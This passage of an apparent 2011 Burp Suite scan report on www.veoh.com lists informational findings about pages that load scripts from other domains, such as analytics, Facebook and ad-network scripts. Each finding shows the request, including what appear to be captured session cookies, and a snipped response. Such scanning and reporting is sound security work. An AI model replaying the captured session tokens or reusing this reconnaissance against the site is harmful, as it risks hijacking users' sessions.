...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.54. http://www.veoh.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.55. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.56. http://www.veoh.com/metrics/logadevent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /metrics/logadevent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /metrics/logadevent HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 28568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.57. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.58. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.59. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.60. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.61. http://www.veoh.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://api.recaptcha.net/challenge?k=6LcgyQAAAAAAAOcV5HwRlHcP2Z_SEJ4HDmPaiBJL">

</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.62. http://www.veoh.com/search/videos/q/-MENUVALUE-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/videos/q/-MENUVALUE- HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 57062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769628"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.63. http://www.veoh.com/search/videos/q/publisher:bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/videos/q/publisher:bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=79
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769625"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.64. http://www.veoh.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /support.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support.html HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 24001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

